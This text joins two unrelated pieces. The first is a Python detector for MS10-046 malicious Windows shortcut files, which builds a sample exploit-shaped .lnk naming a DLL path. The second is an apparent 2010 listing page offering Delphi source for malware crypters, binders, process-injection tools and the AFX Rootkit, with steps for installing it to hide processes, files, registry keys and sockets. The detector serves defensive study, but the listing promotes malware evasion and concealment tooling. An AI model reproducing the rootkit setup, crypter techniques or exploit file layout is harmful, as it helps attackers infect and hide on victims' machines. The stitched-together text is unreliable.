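The shortcut the builder above writes is a ShellLinkHeader followed by a LinkTargetIDList whose items are the My Computer root, the Control Panel folder and an applet item that carries a DLL path instead of a registered applet; that shape, not any particular byte string, is what a scanner should key on. Below is an added example written for this page (not the exploit author's code) that parses .lnk bytes that way and flags the pattern. Both samples are constructed inside the block: one assembled from the components the page's arrays contain (header, the two CLSID items and an applet item naming C:\MS10046.dll, declaring the same over-long IDListSize), and one ordinary, properly terminated shortcut to drive C:. The function and variable names are mine.

```python
import re
import struct
import uuid

HEADER_SIZE = 0x4C
LINK_CLSID = uuid.UUID("00021401-0000-0000-C000-000000000046")
HAS_LINK_TARGET_ID_LIST = 0x00000001
# Shell folder CLSIDs that appear as ItemID payloads in the builder's IDList
MY_COMPUTER = uuid.UUID("20D04FE0-3AEA-1069-A2D8-08002B30309D")
CONTROL_PANEL = uuid.UUID("21EC2020-3AEA-1069-A2DD-08002B30309D")
DRIVE_PATH = re.compile(r"[A-Za-z]:\\[^\x00]{1,260}")


def parse_id_list(data):
    """Split a LinkTargetIDList body into ItemID payloads (size field stripped).
    Stops at the TerminalID, at end of data, or when a size field points past
    the data, in which case the last payload comes back truncated."""
    items, off = [], 0
    while off + 2 <= len(data):
        size = struct.unpack_from("<H", data, off)[0]
        if size < 3:                 # 0 is the TerminalID; 1-2 cannot hold a type byte
            break
        items.append(data[off + 2:off + size])
        off += size
    return items


def item_clsid(item):
    """Shell folder items are: type byte, sort/flags byte, then a 16-byte CLSID."""
    return uuid.UUID(bytes_le=bytes(item[2:18])) if len(item) >= 18 else None


def embedded_path(item):
    """First drive-letter path inside the item's payload, read as UTF-16LE."""
    text = item[:len(item) & ~1].decode("utf-16-le", errors="replace")
    m = DRIVE_PATH.search(text)
    return m.group(0) if m else None


def analyse_lnk(buf):
    """Parse the ShellLinkHeader and LinkTargetIDList and report whether the list
    has the MS10-046 shape: a Control Panel folder item followed by an applet
    item that names a file path instead of a registered applet."""
    r = {"valid": False, "items": 0, "truncated": False,
         "control_panel_item": None, "applet_path": None, "suspicious": False}
    if len(buf) < HEADER_SIZE or struct.unpack_from("<I", buf, 0)[0] != HEADER_SIZE:
        return r
    if uuid.UUID(bytes_le=bytes(buf[4:20])) != LINK_CLSID:
        return r
    r["valid"] = True
    flags = struct.unpack_from("<I", buf, 20)[0]
    if not flags & HAS_LINK_TARGET_ID_LIST or len(buf) < HEADER_SIZE + 2:
        return r
    declared = struct.unpack_from("<H", buf, HEADER_SIZE)[0]
    body = buf[HEADER_SIZE + 2:HEADER_SIZE + 2 + declared]
    r["truncated"] = len(body) < declared   # the builder's file is shorter than it claims
    items = parse_id_list(body)
    r["items"] = len(items)
    for i, it in enumerate(items):
        if item_clsid(it) == CONTROL_PANEL:
            r["control_panel_item"] = i
            for later in items[i + 1:]:
                path = embedded_path(later)
                if path:
                    r["applet_path"], r["suspicious"] = path, True
                    break
            break
    return r


# ---- constructed samples, assembled here for the detector to run on ----
def shell_link_header(flags):
    hdr = bytearray(HEADER_SIZE)
    struct.pack_into("<I", hdr, 0, HEADER_SIZE)
    hdr[4:20] = LINK_CLSID.bytes_le
    struct.pack_into("<I", hdr, 20, flags)
    struct.pack_into("<I", hdr, 60, 1)              # ShowCommand = SW_SHOWNORMAL
    return bytes(hdr)


def item_id(type_and_sort, payload):
    """ItemID = u16 size (including itself) + type/sort bytes + payload."""
    body = type_and_sort + payload
    return struct.pack("<H", len(body) + 2) + body


MY_COMPUTER_ITEM = item_id(b"\x1f\x50", MY_COMPUTER.bytes_le)
CONTROL_PANEL_ITEM = item_id(b"\x2e\x1e", CONTROL_PANEL.bytes_le)
# Applet item in the builder's shape: declared size 0x10C, a short fixed prefix,
# then the DLL path as UTF-16LE; the data ends long before the declared size.
APPLET_ITEM = (b"\x0c\x01" + b"\x00" * 11 + b"\x6a\x00\x00\x00" + b"\x00" * 3
               + " :C:\\MS10046.dll".encode("utf-16-le"))
# LinkFlags 0x81 = HasLinkTargetIDList | IsUnicode, as in the page's header bytes
EXPLOIT_LNK = (shell_link_header(0x81) + struct.pack("<H", 0x136)
               + MY_COMPUTER_ITEM + CONTROL_PANEL_ITEM + APPLET_ITEM)

# An ordinary shortcut: My Computer -> drive C:, properly terminated.
_benign_list = MY_COMPUTER_ITEM + item_id(b"\x2f", b"C:\\" + b"\x00" * 19) + b"\x00\x00"
BENIGN_LNK = shell_link_header(0x81) + struct.pack("<H", len(_benign_list)) + _benign_list

if __name__ == "__main__":
    for label, sample in (("exploit", EXPLOIT_LNK), ("benign", BENIGN_LNK)):
        print(label, analyse_lnk(sample))
```

The parser deliberately does not trust the declared IDListSize: the builder's file is far shorter than the list size it declares and has no TerminalID, so the loop stops at end of data and reports the last item as truncated instead of rejecting the file, which is the malformed input the shell itself accepted. A legitimate shortcut to a Control Panel applet also contains the Control Panel CLSID, so the verdict keys on the applet item naming a drive-letter path: that path is what the shell loaded as a Control Panel module when it rendered the shortcut's icon, and a registered applet needs no such path.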
posted 29 Sep 2010 14:35 by Delphi Basics
[updated 1 Mar 2011 12:05]
Open Source Code Crypter 1.0 by p0ke
I wrote this open source crypter for Delphi coders. It's nothing advanced, but I will probably add functions to it with time.
Features:
- 10 file limit
- Memory Execution support
- EOF-Settings support
- Custom Stub support
- Drop to Harddrive support
Joining Method: Resources
Encryption: Custom XOR
Memory Execution: uMemoryExecute by p0ke. This unit is compatible with Windows XP & Vista but not compatible with Windows 7.
Only Delphi source code is included in the archive. |
posted 18 Sep 2010 15:07 by Delphi Basics
AFX Rootkit 2005 by Aphex
This program patches Windows API to hide certain objects from being listed.
WARNING -> FOR WINDOWS NT/2000/XP/2003 ONLY!
Current Version Hides:
a) Processes
b) Handles
c) Modules
d) Files & Folders
e) Registry Keys & Values
f) Services
g) TCP/UDP Sockets
h) Systray Icons
Configuring a computer with the rootkit is simple...
1. Create a new folder with a unique name i.e. "c:\winnt\rewt\"
2. In this folder place the root.exe i.e. "c:\winnt\rewt\root.exe"
3. Execute root.exe with the "/i" parameter i.e. "start c:\winnt\rewt\root.exe /i"
4. Inside this folder place any other programs or files.
Everything inside the root folder is now invisible! If you place other services or programs in the root folder they will be invisible from process/file/dll/handle/socket/etc listing. However, all programs in the root folder can see each other.
Registry value names are hidden differently from everything else. The name must begin with the root folder name followed by "\" and other characters i.e. "rewt\hiddenstartup1".
Registry key names are hidden if they have the same name as the root folder i.e. "rewt".
Also, the root folder is unique throughout the system. This means "c:\rewt\", "c:\winnt\rewt\" and "c:\winnt\system32\rewt\" all will be hidden because they all share the root folder name "rewt".
Removal: If you install it make sure you know how to remove it!
Method 1
1. Run the root.exe with the "/u" parameter
2. Delete all the files associated with it
3. Reboot
Method 2
1. Boot into safe mode
2. Locate the service with the root folder name
3. Remove the service and delete all the files associated with it
4. Reboot
How To Properly Compile AFX Rootkit
Inside hook.dpr there is a variable...
var
szDllPath: pchar = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX';
After compiling hook.dll you must open it with a hex editor and find the offset of that string of X's.
Once you find the offset you need to open root.dpr. Search for the hex number $4a54 and replace it with the new offset.
Each version of Delphi will have a different offset. The offset $4a54 is for Delphi 6. So you shouldn't need to change it if you use D6. It is always best to double check though.
Only Delphi source code is included in the archive. |
posted 14 Sep 2010 16:07 by Danny Rancher
This crypter is the latest rewrite of the self-injection code, by shapeless and steve10120.
Original self-injecting crypter by shapeless:
Original self-injecting unit by steve10120:
The additional builder code in this release is necessary for two reasons:
- To change the imagebase of the stub file to that of the target file.
- To enlarge the last section so it is big enough to cover the SizeOfImage of the target file.
Author: steve10120
Compiled: Delphi 2007
Tested and working environments: Windows XP, Vista, 7.
Only Delphi source code is included in the archive. |
posted 24 Aug 2010 15:47 by Delphi Basics
[updated 15 Oct 2010 15:35]
PI crypter, coded by Counterstrikewi, is compatible with all executable files.
Joining Method: Resources
Encryption: RC4
Special Features: Most APIs are called dynamically; inject PE into browser.
Thank you steve10120 p0ke SWiM Xash ap0calypse Rogue shapeless testest abhe
Friends DarkCoderSC Slayer616 who! mjrod5 ~Fleck Cracksman FusioN Menace Neo f0rce
Only Delphi source code is included in the archive |
posted 17 Aug 2010 17:23 by Delphi Basics
Delphi Example Binder by ErazerZ
Date: 3rd May 2006
Binding.exe - Main Program, the binder
External Stub.exe - Example of a packed stub, it's 3,75 KB and it works :O
ErazerZ
Only Delphi source code is included in the archive. |
posted 29 Jun 2010 12:53 by Delphi Basics
This crypter uses a new memory injection technique, pioneered by shapeless, in which the current process image is unmapped and replaced with a mapping of a custom PE.
|